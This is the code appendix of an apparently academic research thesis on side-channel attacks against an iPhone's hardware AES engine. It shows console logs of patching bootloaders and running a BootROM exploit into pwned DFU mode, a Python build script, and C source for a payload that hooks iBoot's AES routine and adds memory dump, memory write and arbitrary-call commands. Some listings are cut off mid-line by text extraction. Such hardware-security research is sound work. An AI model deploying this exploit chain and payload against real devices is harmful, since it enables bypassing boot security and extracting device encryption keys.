find_bl_verify_shsh_5_6_7: Found BL verify_shsh at 0x191fc 68 BCode

find_bl_verify_shsh_5_6_7: Leaving... patch_rsa_check: Patching BL verify_shsh at 0x191fc... patch_rsa_check: Leaving... main: Writing out patched file to iBEC.hax... main: Quitting... $ #Step 5: Re-pack bootloaders $ xpwntool iBSS.hax iBSS.pwn -t Firmware/dfu/iBSS.n90bap.RELEASE.dfu /Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3 /Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3 $ xpwntool iBEC.hax iBEC.pwn -t Firmware/dfu/iBEC.n90bap.RELEASE.dfu /Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8

/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8

$ Listing B.1: Patching boot loader images

$ #Step 1: Exploit BootROM $ ./ipwndfu -p *** based on SHAtter exploit (segment overflow) by posixninja and pod2g *** Found: CPID:8930 CPRV:20 CPFM:03 SCEP:01 BDID:00 ECID:000002CE800DA34F IBFL:00 SRTG:[iBoot-574.4] Device is now in pwned DFU Mode. $ #Step 2: Transfer first stage $ irecovery -f iBSS.pwn [======] 100.0% $ #Step 3: Transfer second stage bootloader $ irecovery -f iBEC.pwn [======] 100.0% $ #Step 4: Transfer payload $ irecovery -f gido.bin [======] 100.0% $ #Step 5: Execute payload $ irecovery -s [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE0 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE1 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE8 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE9

======:: :: iBEC for n90ap, Copyright 2013, Apple Inc. :: :: BUILD_TAG: iBoot-1940.10.58 :: :: BUILD_STYLE: RELEASE :: :: USB_SERIAL_NUMBER: CPID:8930 CPRV:20 CPFM:03 SCEP:02 BDID:00 ECID:000002CE800DA34F IBFL:1A SRNM:[85135LVZA4S] :: ======

[FTL:MSG] Apple NAND Driver (AND) RO [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE0 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE1 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE8 [NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE9 69

[FTL:MSG] FIL_Init [OK] [FTL:MSG] BUF_Init [OK] [FTL:MSG] FPart Init [OK] read new style signature 0x43313132 (line:389) [FTL:MSG] VSVFL Register [OK] [WMR:MSG] Metadata whitening is set in NAND signature [FTL:MSG] VFL Init [OK] [FTL:MSG] VFL_Open [OK] [FTL:MSG] YAFTL Register [OK] [FTL:MSG] FTL_Open [OK] Boot Failure Count:0Panic Fail Count:0 Entering recovery mode, starting command prompt > go Initializing GIDO! reconfiguring VOL_DOWN button ... ok precompute TTables ... ok hook_aes_func hook_aes_func done! Done GIDO! > Listing B.2: Loading patched boot loader images and payload

import struct import binascii import subprocess import sys binName = "gido.o" jtool = subprocess.Popen(["jtool", "-l",binName], stdout=subprocess.PIPE) regsizes =[] lastregend =0 for l in jtool.stdout.read().split("\n"): if not "Mem" in l or "LC 00" in l or "nl_symbol_ptr" in l: continue reg = l.split(": ")[1].split("\t")[0] start = reg.split("-") end = int(start[1],16) start = int(start[0],16) pad = start-lastregend lastregend = end size = end-start section = l.split("\t")[3] regsizes.append([pad,size,section]) # print hex(start),hex(end),hex(size)

# print regsizes explbin = "" for reg in regsizes: f = open(binName+"."+reg[2],"rb") r = f.read() f.close() explbin += "\x00"*reg[0] explbin += r # print binascii.hexlify(explbin)+"\n\n" while len(explbin)%4: explbin += "A" 70 BCode

p = open(binName.replace(".o",".bin"),"wb") p.write(explbin) p.close()

print "done building exploit" Listing B.3: Combining sections to raw executable

1 // 2 // main.c 3 // gido 4 // 5 6 #include 7 #include 8 9 10 #pragma mark myAES 11 uint8_t sbox[256] = 12 { 13 0x63,0x7C,0x77,0x7B,0xF2,0x6B,0x6F,0xC5,0x30,0x01,0x67,0x2B,0xFE,0xD7,0xAB,0x76,

14 0xCA,0x82,0xC9,0x7D,0xFA,0x59,0x47,0xF0,0xAD,0xD4,0xA2,0xAF,0x9C,0xA4,0x72,0xC0,

15 0xB7,0xFD,0x93,0x26,0x36,0x3F,0xF7,0xCC,0x34,0xA5,0xE5,0xF1,0x71,0xD8,0x31,0x15,

16 0x04,0xC7,0x23,0xC3,0x18,0x96,0x05,0x9A,0x07,0x12,0x80,0xE2,0xEB,0x27,0xB2,0x75,

17 0x09,0x83,0x2C,0x1A,0x1B,0x6E,0x5A,0xA0,0x52,0x3B,0xD6,0xB3,0x29,0xE3,0x2F,0x84,

18 0x53,0xD1,0x00,0xED,0x20,0xFC,0xB1,0x5B,0x6A,0xCB,0xBE,0x39,0x4A,0x4C,0x58,0xCF,

19 0xD0,0xEF,0xAA,0xFB,0x43,0x4D,0x33,0x85,0x45,0xF9,0x02,0x7F,0x50,0x3C,0x9F,0xA8,

20 0x51,0xA3,0x40,0x8F,0x92,0x9D,0x38,0xF5,0xBC,0xB6,0xDA,0x21,0x10,0xFF,0xF3,0xD2,

21 0xCD,0x0C,0x13,0xEC,0x5F,0x97,0x44,0x17,0xC4,0xA7,0x7E,0x3D,0x64,0x5D,0x19,0x73,

22 0x60,0x81,0x4F,0xDC,0x22,0x2A,0x90,0x88,0x46,0xEE,0xB8,0x14,0xDE,0x5E,0x0B,0xDB,

23 0xE0,0x32,0x3A,0x0A,0x49,0x06,0x24,0x5C,0xC2,0xD3,0xAC,0x62,0x91,0x95,0xE4,0x79,

24 0xE7,0xC8,0x37,0x6D,0x8D,0xD5,0x4E,0xA9,0x6C,0x56,0xF4,0xEA,0x65,0x7A,0xAE,0x08,

25 0xBA,0x78,0x25,0x2E,0x1C,0xA6,0xB4,0xC6,0xE8,0xDD,0x74,0x1F,0x4B,0xBD,0x8B,0x8A,

26 0x70,0x3E,0xB5,0x66,0x48,0x03,0xF6,0x0E,0x61,0x35,0x57,0xB9,0x86,0xC1,0x1D,0x9E,

27 0xE1,0xF8,0x98,0x11,0x69,0xD9,0x8E,0x94,0x9B,0x1E,0x87,0xE9,0xCE,0x55,0x28,0xDF,

28 0x8C,0xA1,0x89,0x0D,0xBF,0xE6,0x42,0x68,0x41,0x99,0x2D,0x0F,0xB0,0x54,0xBB,0x16 29 }; 30 31 uint8_t roundkeys[11][16] = 32 { 33 {0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0 x0f}, 34 {0xd6,0xaa,0x74,0xfd,0xd2,0xaf,0x72,0xfa,0xda,0xa6,0x78,0xf1,0xd6,0xab,0x76,0 xfe}, 35 {0xb6,0x92,0xcf,0x0b,0x64,0x3d,0xbd,0xf1,0xbe,0x9b,0xc5,0x00,0x68,0x30,0xb3,0 xfe}, 71

36 {0xb6,0xff,0x74,0x4e,0xd2,0xc2,0xc9,0xbf,0x6c,0x59,0x0c,0xbf,0x04,0x69,0xbf,0 x41}, 37 {0x47,0xf7,0xf7,0xbc,0x95,0x35,0x3e,0x03,0xf9,0x6c,0x32,0xbc,0xfd,0x05,0x8d,0 xfd}, 38 {0x3c,0xaa,0xa3,0xe8,0xa9,0x9f,0x9d,0xeb,0x50,0xf3,0xaf,0x57,0xad,0xf6,0x22,0 xaa}, 39 {0x5e,0x39,0x0f,0x7d,0xf7,0xa6,0x92,0x96,0xa7,0x55,0x3d,0xc1,0x0a,0xa3,0x1f,0 x6b}, 40 {0x14,0xf9,0x70,0x1a,0xe3,0x5f,0xe2,0x8c,0x44,0x0a,0xdf,0x4d,0x4e,0xa9,0xc0,0 x26}, 41 {0x47,0x43,0x87,0x35,0xa4,0x1c,0x65,0xb9,0xe0,0x16,0xba,0xf4,0xae,0xbf,0x7a,0 xd2}, 42 {0x54,0x99,0x32,0xd1,0xf0,0x85,0x57,0x68,0x10,0x93,0xed,0x9c,0xbe,0x2c,0x97,0 x4e}, 43 {0x13,0x11,0x1d,0x7f,0xe3,0x94,0x4a,0x17,0xf3,0x07,0xa7,0x8b,0x4d,0x2b,0x30,0 xc5} 44 }; 45 46 uint8_t fixedKey[32] ={0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0 x0c,0x0d,0x0e,0x0f,0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b, 0x0c,0x0d,0x0e,0x0f}; 47 48 void aes_precompute_tables(); 49 void aes_encrypt(uint8_t plaintext[16], uint8_t roundkeys[11][16], uint8_t ciphertext[16]); 50 51 52 uint32_t *T0 =(uint32_t*)(0x41414141); 53 uint32_t *T1 =(uint32_t*)(0x41414141); 54 uint32_t *T2 =(uint32_t*)(0x41414141); 55 uint32_t *T3 =(uint32_t*)(0x41414141); 56 57 #pragma mark typedefs 58 59 typedef struct CmdArg { 60 signed int unk1; 61 unsigned int uinteger; 62 signed int integer; 63 unsigned int type; 64 char* string; 65 } CmdArg; 66 67 typedef struct CmdInfo { 68 char* name; 69 void *handler; 70 char* description; 71 } CmdInfo; 72 73 typedef enum { 74 kAesEncrypt =0x10, 75 kAesDecrypt =0x11 76 } AesOption; 77 78 typedef enum { 79 kAesType128 =0x00000000, 80 kAesType192 =0x10000000, 81 kAesType256 =0x20000000 82 } AesType; 83 84 typedef enum { 85 kAesSize128 =0x20, 86 kAesSize192 =0x28, 87 kAesSize256 =0x30 72 BCode

88 } AesSize; 89 90 typedef enum { 91 kAesTypeUser =0x0, 92 kAesTypeGid =0x200, 93 kAesTypeUid =0x201 94 } AesMode; 95 96 97 98 99 100 #pragma mark ibec funcs 101 102 int (*_printf)(const char *,...) = (void*)(0x5ff33ca4+1); 103 int (*_snprintf)(char *str, size_t size, const char *format,...)=(void*)(0x5ff3425c+1); 104 void *(*_malloc)(size_t)=(void*)(0x5ff185cc+1); 105 void (*_free)(void*) = (void*)(0x5ff18680+1); 106 int(*aes_crypto_cmd)(AesOption option, void* input, void* output, unsigned int size, AesMode mode, void* key, void* iv)=(void*)(0x5ff208ac+1); 107 int (*uart_getc)(int port, int wait)=(void*)(0x5ff14748+1); 108 int (*uart_puts)(int port, const char *s)=(void*)(0x5ff1472c+1); 109 110 111 uint32_t (*gpio_read)(uint32_t gpio)=(void*)(0x5ff02768+1); 112 void (*gpio_write)(uint32_t gpio, uint32_t val)=(void*)(0x5ff02790+1); 113 void (*gpio_configure)(uint32_t gpio, uint32_t config)=(void*)(0x5ff0280c+1); 114 115 void (*watchdog_tickle)(void)=(void*)(0x5ff1f88c+1); 116 117 int (*env_set)(const char *name, const char *val, uint32_t zero)=(void*)(0x5ff16ef0+1); 118 size_t (*env_get_int)(const char *name, size_t fallback)=(void*)(0x5ff16d5c+1); 119 120 #pragma mark ibec constants 121 122 #define GPIO_POWER 1 123 #define GPIO_VOL_UP 2 124 #define GPIO_VOL_DOWN 3 125 126 CmdInfo ***ibec_cmd_struct_pointer =(void*)(0x5ff1ed3c); 127 128 #pragma mark my functions 129 int cmd_echo(int argc, CmdArg* argv); 130 int cmd_md(int argc, CmdArg* argv); 131 int cmd_mw(int argc, CmdArg* argv); 132 int aes_cmd(int argc, CmdArg* argv); 133 int cmd_call(int argc, CmdArg* argv); 134 int cmd_measure(int argc, CmdArg* argv); 135 int cmd_decypt(int argc, CmdArg* argv); 136 137 138 unsigned int aes_encrypt_key(char* in, char* out, unsigned int size); 139 unsigned int aes_decrypt_key(char* in, char* out, unsigned int size); 140 unsigned int aes_encrypt_key_custom(char* in, char* out, unsigned int size, void *key); 141 unsigned int aes_decrypt_key_custom(char* in, char* out, unsigned int size, void *key); 142 void hook_aes_func(); 143 144 145 void DumpHex(const void* data, size_t size); 146 int parseHex(const char *instr, char *ret, size_t *outSize); 147 148 void memset(void *a, unsigned char b, size_t len); 73

149 void memmove(void *a, void *b, size_t len); 150 int strcmp(const char *a, const char *b); 151 int strncmp(const char *a, const char *b, uint32_t n); 152 int strlen(const char *s); 153 long atol(const char *s); 154 void clear_icache(); 155 uint32_t bswap32(uint32_t num); 156 157 #pragma mark code 158 // /* --- this HAS to be TOP function! --- */ 159 int main(int argc, const char * argv[]); 160 void reposition(); 161 asm( 162 "b _reposition\n\t" 163 ".skip 0x100\n\t" 164 ); 165 166 void reposition(){ 167 uint8_t *newspace = _malloc(0x6000); 168 newspace += 0x1000; 169 newspace =(uint8_t*)(((uint32_t)newspace)&~0xfff); 170 memmove(newspace,0x40000000,0x6000-0x1000); 171 172 uint8_t *np = main; 173 np -= 0x40000000; 174 np += (uint32_t)newspace; 175 np =(uint8_t*)(((uint32_t)np)|1); 176 177 void (*newmain)() = np; 178 179 clear_icache(); 180 newmain(); 181 } 182 183 int main(int argc, const char * argv[]) { 184 CmdInfo **newArgs = NULL; 185 _printf("Initializing GIDO!\n"); 186 187 CmdInfo *bootx =(void*)0x5ff419c0; 188 bootx->name = "echo"; 189 bootx->handler = cmd_echo; 190 bootx->description = "echo something to console"; 191 192 CmdInfo *memboot =(void*)0x5ff419d0; 193 memboot->name = "aes"; 194 memboot->handler = aes_cmd; 195 memboot->description = "aes talk to aes engin"; 196 197 CmdInfo *ticket =(void*)0x5ff4217c; 198 ticket->name = "md"; 199 ticket->handler = cmd_md; 200 ticket->description = "dump memory"; 201 202 CmdInfo *devicetree =(void*)0x5ff4211c; 203 devicetree->name = "decrypt"; 204 devicetree->handler = cmd_decypt; 205 devicetree->description = "decrypt AES hook"; 206 207 CmdInfo *setpicture =(void*)0x5ff41a54; 208 setpicture->name = "mw"; 209 setpicture->handler = cmd_mw; 210 setpicture->description = "write memory"; 74 BCode

211 212 CmdInfo *reboot =(void*)0x5ff419f4; 213 reboot->name = "call"; 214 reboot->handler = cmd_call; 215 reboot->description = "call function"; 216 217 CmdInfo *go =(void*)0x5ff41a64; 218 go->name = "measure"; 219 go->handler = cmd_measure; 220 go->description = "switch to measure mode"; 221 222 _printf("reconfiguring VOL_DOWN button ... "); 223 gpio_configure(GPIO_VOL_DOWN,1); //set gpio to be output 224 gpio_write(GPIO_VOL_DOWN,0); 225 _printf("ok\n"); 226 227 _printf("precompute TTables ... "); 228 aes_precompute_tables(); 229 _printf("ok\n"); 230 231 hook_aes_func(); 232 233 _printf("Done GIDO!\n"); 234 return 0; 235 } 236 237 void aes_function_hook(){ //realAES 238 asm( 239 //prepare GPIO write 240 "movs r4, #0xc\n\t" 241 "movt r4, #0xbfa0\n\t" 242 "mov r0, #0x92\n\t" 243 "mov r1, #0x93\n\t" 244 245 246 //prepare DMA access 247 "movw r5, #0x2000 \t\n" //RX (r1) 248 "movt r5, #0x8700 \t\n" 249 250 "ldr r7, [r5]\t\n" //RX_val 251 "orr r7, r7, #0x1\t\n" //RX_val 252 "str r7, [r5]\t\n" //store RX first! 253 254 255 "movw r6, #0x1000 \t\n" 256 "movt r6, #0x8700 \t\n" //TX (r0) 257 258 "ldr r7, [r6]\t\n" //TX_val 259 "orr r7, r7, #0x1\t\n" //TX_val 260 261 //about to enter time critical section! 262 "strb r1, [r4]\n\t" //set GPIO high (AES_START) 263 //START_CRITICAL_SECTION 264 265 "str r7, [r6]\t\n" //store TX (AES_START) 266 267 "w1:\t\n" 268 "ldr r7, [r5]\t\n" //RX_val 269 "and r7, r7, #0x30000\t\n" //load RX_val and check for idle 270 "cmp r7, #0x10000\t\n" 271 "beq w1\t\n" 272 //-- END_CRITICAL_SECTION 75

273 "strb r0, [r4]\n\t" //set GPIO low 274 ); 275 } 276 277 278 void hook_aes_func(){ 279 _printf("hook_aes_func\n"); 280 char trampolin[] = "\xDF\xF8\x02\x00\x01\xE0\x44\x43\x42\x41\x80\x47"; 281 void **dstVal =(void **)&trampolin[6]; 282 *dstVal = aes_function_hook; 283 284 uint16_t *startHook =(void*)0x5ff02138; 285 uint16_t *endHook =(void*)0x5ff0215a; //not inclusive 286 287 for (int i=0; i= 2) { 304 for(i =1;i < argc; i++) { 305 _printf("%s ", argv[i].string); 306 } 307 _printf("\n"); 308 return 0; 309 } 310 _printf("usage: echo \n"); 311 return 0; 312 } 313 314 int cmd_decypt(int argc, CmdArg* argv){ 315 size_t payloadSize = env_get_int("filesize",0); 316 char *inBuf =0x40000000; 317 318 char outBuf[0x300]; 319 char printBuf[0x600]; 320 aes_decrypt_key(inBuf, outBuf, payloadSize); 321 322 for (int i =0;i < payloadSize; i++) { 323 unsigned char c =(unsigned char)outBuf[i]; 324 if((printBuf[2*i +0]=c >> 4) < 10){ 325 printBuf[2*i +0]+=’0’; 326 }else{ 327 printBuf[2*i +0]+=’a’ -10; 328 } 329 if((printBuf[2*i +1]=c &0xf)<10){ 330 printBuf[2*i +1]+=’0’; 331 }else{ 332 printBuf[2*i +1]+=’a’ -10; 333 } 334 printBuf[2*i +2]=0; 76 BCode

335 } 336 env_set("cmd-results",printBuf,0); 337 watchdog_tickle(); 338 return 0; 339 } 340 341 int cmd_call(int argc, CmdArg* argv){ 342 int i =0; 343 uint32_t args[4] = {0,0,0,0}; 344 uint32_t func =0; 345 if(argc >= 2) { 346 size_t rt =0; 347 parseHex(argv[1].string,&func,&rt); 348 func = bswap32(func); 349 if (rt >4){ 350 _printf("error funcpointer too large\n"); 351 return 0; 352 } 353 for (size_t i =2;i-2 < 4 && i < argc; i++) { 354 size_t rt =0; 355 parseHex(argv[i].string,&args[i-2], &rt); 356 args[i-2] = bswap32(args[i-2]); 357 } 358 _printf("calling (0x%08x)(0x%08x,0x%08x,0x%08x,0x%08x) ",func,args[0],args[1],args[2],args [3]); 359 360 uint32_t retval =((uint32_t (*) (uint32_t,uint32_t,uint32_t,uint32_t))func)(args[0],args [1],args[2],args[3]); 361 _printf("reval=0x%08x (%lu)\n",retval,retval); 362 return 0; 363 } 364 _printf("usage: call \n"); 365 return 0; 366 } 367 368 int cmd_measure(int argc, CmdArg* argv){ 369 uart_puts(0,"enter measure mode\n"); 370 char buf[0x200]; 371 char printBuf[100]; 372 int keepRunning =1; 373 374 _printf("disable Idle poweroff ..."); 375 *(uint16_t*)0x5ff00f68 =0x4770; 376 clear_icache(); 377 _printf("ok\n"); 378 379 //patch task_yield to return 0; 380 *((uint16_t*)0x5ff1f008)=0x4770; 381 clear_icache(); 382 383 while (gpio_read(GPIO_VOL_UP)&&keepRunning){ 384 memset(buf,0,sizeof(buf)); 385 for (size_t i =0;i < sizeof(buf)&&gpio_read(GPIO_VOL_UP); i++) { 386 while ((buf[i]=uart_getc(0,0)) == -1 && gpio_read(GPIO_VOL_UP)); 387 if (i >4&&!strncmp(buf+i-3,"END",3)) { 388 uart_puts(0,"[M] found END tag!\n"); 389 buf[i]=’\0’;//zero terminate buf 390 391 if (strncmp(buf, "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE", sizeof(" EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE")-1) == 0) { 392 keepRunning =0; 393 break; 77

394 } 395 396 if (i>10&&!strncmp(buf,"BEGIN",5)) { 397 uart_puts(0,"[M] valid command detected\n"); 398 size_t rt =0; 399 int seedsLen =0; 400 uint8_t seeds[3][16]; 401 unsigned long encCount =0; 402 unsigned long mode =0; 403 uint8_t cipherEnc[16]; 404 uint8_t aesIn[48]; 405 uint8_t aesOut[48]; 406 //expecting command like: "BEGIN " 407 408 //zero terminate after seeds 409 char *encStr =&buf[5/*BEGIN*/]; 410 while (*++encStr != ’ ’){ 411 if (*encStr == 0){ 412 uart_puts(0,"[M] failed parsing encStr!\n"); 413 break; 414 } 415 } 416 *encStr = ’\0’; 417 if (parseHex(&buf[5],&seeds,&rt)||(rt != 16 && rt != 32 && rt != 48)){ 418 uart_puts(0,"[M] failed parsing seeds failed!\n"); 419 break; 420 } 421 seedsLen = rt; 422 423 if (!(encCount = atol(&buf[5/*BEGIN*/+2*seedsLen/**/+1/*space*/]))){ 424 uart_puts(0,"[M] failed parsing encCount!\n"); 425 break; 426 } 427 428 char *modeStr =&buf[5/*BEGIN*/+2*seedsLen/**/+1/*space*/]; 429 while (*++modeStr != ’ ’){ 430 if (*modeStr == 0){ 431 uart_puts(0,"[M] failed parsing modeStr!\n"); 432 break; 433 } 434 } 435 436 if (!(mode = atol(modeStr))){ 437 uart_puts(0,"[M] failed parsing mode!\n"); 438 break; 439 } 440 441 if (mode == 1) { //MODE: staticVSrandom 442 if (seedsLen != 32){ 443 uart_puts(0,"[M] invalid seedsLen="); 444 _snprintf(printBuf, sizeof(printBuf), "%d", seedsLen); 445 uart_puts(0,printBuf); 446 uart_puts(0," but expected 32\n"); 447 break; 448 } 449 uint8_t cipherSel[16]; 450 uart_puts(0,"[M] seed encrypt="); 451 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 452 uart_puts(0,printBuf); 78 BCode

453 uart_puts(0,"\n[M] seed select="); 454 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 455 uart_puts(0,printBuf); 456 uart_puts(0,"\n[M] encCount="); 457 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 458 uart_puts(0,printBuf); 459 460 uint8_t aesIn[128]; 461 uint8_t aesOut[128]; 462 463 for (long z =0;z < encCount; z++) { 464 aes_encrypt(seeds[1],roundkeys,cipherSel); 465 466 for (int mult =0;mult

503 uart_puts(0,printBuf); 504 uart_puts(0,"\n[M] user key="); 505 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 506 uart_puts(0,printBuf); 507 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 508 uart_puts(0,printBuf); 509 uart_puts(0,"\n[M] encCount="); 510 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 511 uart_puts(0,printBuf); 512 513 for (long z =0;z < encCount; z++) { 514 aes_encrypt(seeds[0],roundkeys,cipherEnc); 515 aes_encrypt_key_custom(cipherEnc,(char*)aesOut, 16, seeds[1]); 516 memmove(seeds[0], cipherEnc, 16); 517 ((uint64_t *)cipherMesh)[0] ^= ((uint64_t *)aesOut)[0]; 518 ((uint64_t *)cipherMesh)[1] ^= ((uint64_t *)aesOut)[1]; 519 watchdog_tickle(); 520 } 521 522 gpio_write(GPIO_VOL_DOWN,1); 523 gpio_write(GPIO_VOL_DOWN,0); 524 525 uart_puts(0,"[M] final encrypt="); 526 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 527 uart_puts(0,printBuf); 528 uart_puts(0,"\n[M] final ciphermesh="); 529 memmove(seeds[1], cipherMesh, 16); 530 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 531 uart_puts(0,printBuf); 532 uart_puts(0,"\n"); 533 534 }else if (mode == 3){ //MODE: random with userkey decrypt cbc 535 if (seedsLen != 48){ 536 uart_puts(0,"[M] invalid seedsLen="); 537 _snprintf(printBuf, sizeof(printBuf), "%d", seedsLen); 538 uart_puts(0,printBuf); 539 uart_puts(0," but expected 48\n"); 540 break; 541 } 542 uint8_t plainmesh[16]; 543 memset(plainmesh,0,sizeof(plainmesh)); 544 545 uart_puts(0,"[M] seed encrypt="); 546 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 547 uart_puts(0,printBuf); 548 uart_puts(0,"\n[M] user key="); 549 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x 80 BCode

%02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 550 uart_puts(0,printBuf); 551 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 552 uart_puts(0,printBuf); 553 uart_puts(0,"\n[M] encCount="); 554 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 555 uart_puts(0,printBuf); 556 557 for (long z =0;z < encCount; z++) { 558 aes_encrypt(seeds[0],roundkeys,cipherEnc); 559 560 for (size_t m =0;m

597 uart_puts(0,"\n[M] user key="); 598 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 599 uart_puts(0,printBuf); 600 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 601 uart_puts(0,printBuf); 602 uart_puts(0,"\n[M] encCount="); 603 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 604 uart_puts(0,printBuf); 605 606 uint8_t aesIn[128]; 607 uint8_t aesOut[128]; 608 609 for (long z =0;z < encCount; z++) { 610 for (int mult =0;mult

647 648 uart_puts(0,"[M] seed encrypt="); 649 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 650 uart_puts(0,printBuf); 651 uart_puts(0,"\n[M] encCount="); 652 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 653 uart_puts(0,printBuf); 654 655 uint8_t aesIn[128]; 656 uint8_t aesOut[128]; 657 658 for (long z =0;z < encCount; z++) { 659 for (int mult =0;mult<16byte sel seed> END 83

